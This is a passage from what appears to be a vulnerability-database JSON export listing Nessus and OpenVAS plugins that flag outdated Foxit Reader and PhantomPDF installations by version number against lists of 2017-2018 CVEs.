value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [{\n 'min_version' : '9.0',\n 'fixed_version' : '9.1.0.5096'\n }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-30T08:25:37", "description": "The version of Foxit Reader installed on the remote Windows host is\nprior to 9.1. It is, therefore, affected by multiple vulnerabilities.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-04-27T00:00:00", "title": "Foxit Reader < 9.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-17557", "CVE-2018-3853", "CVE-2018-3842", "CVE-2018-3850", "CVE-2017-14458"], "modified": "2018-04-27T00:00:00", "cpe": ["cpe:/a:foxitsoftware:foxit_reader"], "id": "FOXIT_READER_9_1_0_5096.NASL", "href": "https://www.tenable.com/plugins/nessus/109399", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109399);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/04/27\");\n\n script_cve_id(\n \"CVE-2017-14458\",\n \"CVE-2017-17557\",\n \"CVE-2018-3842\",\n \"CVE-2018-3850\",\n \"CVE-2018-3853\"\n );\n script_bugtraq_id(103942);\n script_xref(name:\"ZDI\", value:\"ZDI-18-312\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-313\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-315\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-329\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-330\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-331\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-332\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-335\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-339\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-340\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-341\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-342\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-344\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-345\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-346\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-348\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-349\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-350\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-351\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-352\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-354\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-358\");\n script_xref(name:\"ZDI\", value:\"ZDI-18-359\");\n\n script_name(english:\"Foxit Reader < 9.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Foxit Reader.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF viewer installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Foxit Reader installed on the remote Windows host is\nprior to 9.1. It is, therefore, affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.foxitsoftware.com/support/security-bulletins.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit Reader version 9.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-14458\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:foxit_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_reader_installed.nasl\");\n script_require_keys(\"installed_sw/Foxit Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Foxit Reader';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [{\n 'min_version' : '9.0',\n 'fixed_version' : '9.1.0.5096'\n }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-01T02:47:24", "description": "According to its version, the Foxit PhantomPDF application (formally\nknown as Phantom) installed on the remote Windows host is prior to\n8.3.6. It is, therefore, affected by multiple vulnerabilities.", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-12-21T00:00:00", "title": "Foxit PhantomPDF < 8.3.6 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10303", "CVE-2018-3843", "CVE-2017-17557", "CVE-2018-10302", "CVE-2018-3853", "CVE-2018-3842", "CVE-2018-3850", "CVE-2017-14458"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:foxitsoftware:phantompdf", "cpe:/a:foxitsoftware:phantom"], "id": "FOXIT_PHANTOM_8_3_6.NASL", "href": "https://www.tenable.com/plugins/nessus/119837", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119837);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/10/31 15:18:52\");\n\n script_cve_id(\n \"CVE-2017-14458\",\n \"CVE-2017-17557\",\n \"CVE-2018-3842\",\n \"CVE-2018-3843\",\n \"CVE-2018-3850\",\n \"CVE-2018-3853\",\n \"CVE-2018-10302\",\n \"CVE-2018-10303\"\n );\n script_bugtraq_id(103942, 103999);\n\n script_name(english:\"Foxit PhantomPDF < 8.3.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Foxit PhantomPDF.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally\nknown as Phantom) installed on the remote Windows host is prior to\n8.3.6. It is, therefore, affected by multiple vulnerabilities.\");\n # https://www.foxitsoftware.com/support/security-bulletins.php\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2f244c3e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 8.3.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-3853\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [{\n 'min_version' : '8.0',\n 'max_version' : '8.3.5.30351',\n 'fixed_version' : '8.3.6'\n }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-30T08:25:30", "description": "According to its version, the Foxit PhantomPDF application (formally\nknown as Phantom) installed on the remote Windows host is prior to\n9.1. It is, therefore, affected by multiple vulnerabilities.", "edition": 13, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-12-21T00:00:00", "title": "Foxit PhantomPDF < 9.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5676", "CVE-2018-5680", "CVE-2018-5679", "CVE-2018-5677", "CVE-2018-10303", "CVE-2018-5675", "CVE-2018-3843", "CVE-2017-17557", "CVE-2018-10302", "CVE-2018-5678", "CVE-2018-3853", "CVE-2018-5674", "CVE-2018-7406", "CVE-2018-7407", "CVE-2018-3842", "CVE-2018-3850", "CVE-2017-14458"], "modified": "2018-12-21T00:00:00", "cpe": ["cpe:/a:foxitsoftware:phantompdf", "cpe:/a:foxitsoftware:phantom"], "id": "FOXIT_PHANTOM_9_1_0.NASL", "href": "https://www.tenable.com/plugins/nessus/119838", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119838);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/04/27\");\n\n script_cve_id(\n \"CVE-2017-14458\",\n \"CVE-2017-17557\",\n \"CVE-2018-3842\",\n \"CVE-2018-3843\",\n \"CVE-2018-3850\",\n \"CVE-2018-3853\",\n \"CVE-2018-5674\",\n \"CVE-2018-5675\",\n \"CVE-2018-5676\",\n \"CVE-2018-5677\",\n \"CVE-2018-5678\",\n \"CVE-2018-5679\",\n \"CVE-2018-5680\",\n \"CVE-2018-7406\",\n \"CVE-2018-7407\",\n \"CVE-2018-10302\",\n \"CVE-2018-10303\"\n );\n script_bugtraq_id(103942, 103999, 104300);\n\n script_name(english:\"Foxit PhantomPDF < 9.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Foxit PhantomPDF.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally\nknown as Phantom) installed on the remote Windows host is prior to\n9.1. It is, therefore, affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.foxitsoftware.com/support/security-bulletins.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 9.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-14458\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [{\n 'min_version' : '9.0',\n 'max_version' : '9.0.1.1049',\n 'fixed_version' : '9.1'\n }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-07-17T14:18:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-3843", "CVE-2017-17557", "CVE-2018-10302", "CVE-2018-3853", "CVE-2018-3842", "CVE-2018-3850", "CVE-2017-14458"], "description": "The host is installed with Foxit PhantomPDF\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-04-25T00:00:00", "id": "OPENVAS:1361412562310813157", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813157", "type": "openvas", "title": "Foxit PhantomPDF Multiple Vulnerabilities-Apr18 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Foxit PhantomPDF Multiple Vulnerabilities-Apr18 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:foxitsoftware:phantompdf\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813157\");\n script_version(\"2019-07-05T10:16:38+0000\");\n script_cve_id(\"CVE-2018-3842\", \"CVE-2017-17557\", \"CVE-2017-14458\", \"CVE-2018-3853\",\n \"CVE-2018-3850\", \"CVE-2018-3843\", \"CVE-2018-10302\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:16:38 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 14:50:06 +0530 (Wed, 25 Apr 2018)\");\n script_name(\"Foxit PhantomPDF Multiple Vulnerabilities-Apr18 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Foxit PhantomPDF\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error where the application passes an insufficiently qualified path in\n loading an external library when a user launches the application.\n\n - A heap buffer overflow error.\n\n - Multiple use-after-free errors.\n\n - The use of uninitialized new 'Uint32Array' object or member variables in\n 'PrintParams' or 'm_pCurContex' objects.\n\n - An incorrect memory allocation, memory commit, memory access, or array access.\n\n - Type Confusion errors.\n\n - An error in 'GoToE' & 'GoToR' Actions.\n\n - An out-of-bounds read error in the '_JP2_Codestream_Read_SOT' function.\n\n - An error since the application did not handle a COM object properly.\n\n - An error allowing users to embed executable files.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial of service condition, execute arbitrary code and\n gain access to sensitive data from memory.\");\n\n script_tag(name:\"affected\", value:\"Foxit PhantomPDF versions 9.0.1.1049 and\n prior on windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Foxit Reader version 9.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.foxitsoftware.com/support/security-bulletins.php#content-2018\");\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_foxit_phantom_reader_detect.nasl\");\n script_mandatory_keys(\"foxit/phantompdf/ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\npdfVer = infos['version'];\npdfPath = infos['location'];\n\n## 9.1 == 9.1.0.5096\nif(version_is_less(version:pdfVer, test_version:\"9.1.0.5096\"))\n{\n report = report_fixed_ver(installed_version:pdfVer, fixed_version:\"9.1\", install_path:pdfPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:18:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10303", "CVE-2018-3843", "CVE-2017-17557", "CVE-2018-10302", "CVE-2018-3853", "CVE-2018-3842", "CVE-2018-3850", "CVE-2017-14458"], "description": "The host is installed with Foxit PhantomPDF\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-18T00:00:00", "id": "OPENVAS:1361412562310813196", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813196", "type": "openvas", "title": "Foxit PhantomPDF Multiple Vulnerabilities-May18 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Foxit PhantomPDF Multiple Vulnerabilities-May18 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:foxitsoftware:phantompdf\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813196\");\n script_version(\"2019-07-05T10:16:38+0000\");\n script_cve_id(\"CVE-2017-17557\", \"CVE-2017-14458\", \"CVE-2018-3842\", \"CVE-2018-3853\",\n \"CVE-2018-3850\", \"CVE-2018-10303\", \"CVE-2018-10302\", \"CVE-2018-3843\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:16:38 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-18 12:43:57 +0530 (Fri, 18 May 2018)\");\n script_name(\"Foxit PhantomPDF Multiple Vulnerabilities-May18 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Foxit PhantomPDF\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An unsafe DLL loading as application passes an insufficiently qualified path\n in loading an external library when a user launches the application.\n\n - An out-of-bounds read and write error.\n\n - A type confusion error while executing certain XFA functions in crafted PDF\n files since the application could transform non-CXFA_Object to CXFA_Object\n without judging the data type and use the discrepant CXFA_Object to get layout\n object directly.\n\n - An unspecified error in GoToE & GoToR Actions.\n\n - The application is not running in Safe-Reading-Mode and can be abused via\n '_JP2_Codestream_Read_SOT' function.\n\n - An error as application do not handle a COM object properly.\n\n - A use-after-free error as the application could continue to traverse pages\n after the document has been closed or free certain objects repeatedly.\n\n - Uninitialized memory or pointer error due to the use of uninitialized new\n 'Uint32Array' object or member variables in 'PrintParams' or 'm_pCurContex'\n objects.\n\n - A use-after-free error due to the use of freed object when executing JavaScript\n or invoking certain functions to get object properties.\n\n - A use-after-free error due to the use of object which has been closed or removed.\n\n - A type confusion error when parsing files with associated file annotations due\n to deference of an object of invalid type.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial of service condition, execute arbitrary code and\n gain access to sensitive data from memory.\");\n\n script_tag(name:\"affected\", value:\"Foxit PhantomPDF version 8.3.5.30351 and\n earlier on windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Foxit PhantomPDF version 8.3.6\n or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.foxitsoftware.com/support/security-bulletins.php#content-2018\");\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_foxit_phantom_reader_detect.nasl\");\n script_mandatory_keys(\"foxit/phantompdf/ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\npdfVer = infos['version'];\npdfPath = infos['location'];\n\n## 8.3.6 == 8.3.6.35572\nif(version_is_less(version:pdfVer, test_version:\"8.3.6.35572\"))\n{\n report = report_fixed_ver(installed_version:pdfVer, fixed_version:\"8.3.6\", install_path:pdfPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:18:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1180", "CVE-2018-5676", "CVE-2018-10476", "CVE-2018-9977", "CVE-2018-10495", "CVE-2018-10490", "CVE-2018-5680", "CVE-2018-9961", "CVE-2018-10493", "CVE-2018-9982", "CVE-2018-9935", "CVE-2018-1173", "CVE-2018-9968", "CVE-2018-9984", "CVE-2018-9951", "CVE-2018-10485", "CVE-2018-9964", "CVE-2018-5679", "CVE-2018-9952", "CVE-2018-10475", "CVE-2018-9979", "CVE-2018-9959", "CVE-2018-5677", "CVE-2018-9962", "CVE-2018-10303", "CVE-2018-1177", "CVE-2018-9963", "CVE-2018-9958", "CVE-2018-9940", "CVE-2018-9975", "CVE-2018-9941", "CVE-2018-9948", "CVE-2018-10483", "CVE-2018-5675", "CVE-2018-1178", "CVE-2018-10473", "CVE-2018-9971", "CVE-2018-3939", "CVE-2018-9947", "CVE-2018-10480", "CVE-2018-9954", "CVE-2018-9938", "CVE-2018-9939", "CVE-2018-10478", "CVE-2018-3843", "CVE-2018-9949", "CVE-2018-17623", "CVE-2018-1176", "CVE-2018-10474", "CVE-2018-10484", "CVE-2018-9976", "CVE-2018-9983", "CVE-2018-9981", "CVE-2018-10482", "CVE-2018-9956", "CVE-2018-10492", "CVE-2018-9936", "CVE-2017-17557", "CVE-2018-10302", "CVE-2018-5678", "CVE-2018-10477", "CVE-2018-10494", "CVE-2018-3853", "CVE-2018-10479", "CVE-2018-9972", "CVE-2018-9943", "CVE-2018-9974", "CVE-2018-10487", "CVE-2018-5674", "CVE-2018-1179", "CVE-2018-9965", "CVE-2018-9942", "CVE-2018-9980", "CVE-2018-9969", "CVE-2018-7407", "CVE-2018-3842", "CVE-2018-9978", "CVE-2018-9945", "CVE-2018-9955", "CVE-2018-9950", "CVE-2018-1174", "CVE-2018-9966", "CVE-2018-9957", "CVE-2018-9946", "CVE-2018-10486", "CVE-2018-9960", "CVE-2018-3924", "CVE-2018-1175", "CVE-2018-10488", "CVE-2018-9944", "CVE-2018-10489", "CVE-2018-9937", "CVE-2018-9967", "CVE-2018-9970", "CVE-2018-3850", "CVE-2018-10491", "CVE-2018-10481", "CVE-2018-9973", "CVE-2018-9953", "CVE-2017-14458"], "description": "The host is installed with Foxit Reader\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-04-25T00:00:00", "id": "OPENVAS:1361412562310813156", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813156", "type": "openvas", "title": "Foxit Reader Multiple Vulnerabilities-Apr18 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Foxit Reader Multiple Vulnerabilities-Apr18 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:foxitsoftware:reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813156\");\n script_version(\"2019-07-05T10:16:38+0000\");\n script_cve_id(\"CVE-2017-14458\", \"CVE-2017-17557\", \"CVE-2018-10302\", \"CVE-2018-10303\",\n \"CVE-2018-10473\", \"CVE-2018-10474\", \"CVE-2018-10475\", \"CVE-2018-10476\",\n \"CVE-2018-10477\", \"CVE-2018-10478\", \"CVE-2018-10479\", \"CVE-2018-10480\",\n \"CVE-2018-10481\", \"CVE-2018-10482\", \"CVE-2018-10483\", \"CVE-2018-10484\",\n \"CVE-2018-10485\", \"CVE-2018-10486\", \"CVE-2018-10487\", \"CVE-2018-10488\",\n \"CVE-2018-10489\", \"CVE-2018-10490\", \"CVE-2018-10491\", \"CVE-2018-10492\",\n \"CVE-2018-10493\", \"CVE-2018-10494\", \"CVE-2018-10495\", \"CVE-2018-1173\",\n \"CVE-2018-1174\", \"CVE-2018-1175\", \"CVE-2018-1176\", \"CVE-2018-1177\",\n \"CVE-2018-1178\", \"CVE-2018-1179\", \"CVE-2018-1180\", \"CVE-2018-3842\",\n \"CVE-2018-3843\", \"CVE-2018-3850\", \"CVE-2018-3853\", \"CVE-2018-5674\",\n \"CVE-2018-5675\", \"CVE-2018-5676\", \"CVE-2018-5677\", \"CVE-2018-5678\",\n \"CVE-2018-5679\", \"CVE-2018-5680\", \"CVE-2018-7407\", \"CVE-2018-9935\",\n \"CVE-2018-9936\", \"CVE-2018-9937\", \"CVE-2018-9938\", \"CVE-2018-9939\",\n \"CVE-2018-9940\", \"CVE-2018-9941\", \"CVE-2018-9942\", \"CVE-2018-9943\",\n \"CVE-2018-9944\", \"CVE-2018-9945\", \"CVE-2018-9946\", \"CVE-2018-9947\",\n \"CVE-2018-9948\", \"CVE-2018-9949\", \"CVE-2018-9950\", \"CVE-2018-9951\",\n \"CVE-2018-9952\", \"CVE-2018-9953\", \"CVE-2018-9954\", \"CVE-2018-9955\",\n \"CVE-2018-9956\", \"CVE-2018-9957\", \"CVE-2018-9958\", \"CVE-2018-9959\",\n \"CVE-2018-9960\", \"CVE-2018-9961\", \"CVE-2018-9962\", \"CVE-2018-9963\",\n \"CVE-2018-9964\", \"CVE-2018-9965\", \"CVE-2018-9966\", \"CVE-2018-9967\",\n \"CVE-2018-9968\", \"CVE-2018-9969\", \"CVE-2018-9970\", \"CVE-2018-9971\",\n \"CVE-2018-9972\", \"CVE-2018-9973\", \"CVE-2018-9974\", \"CVE-2018-9975\",\n \"CVE-2018-9976\", 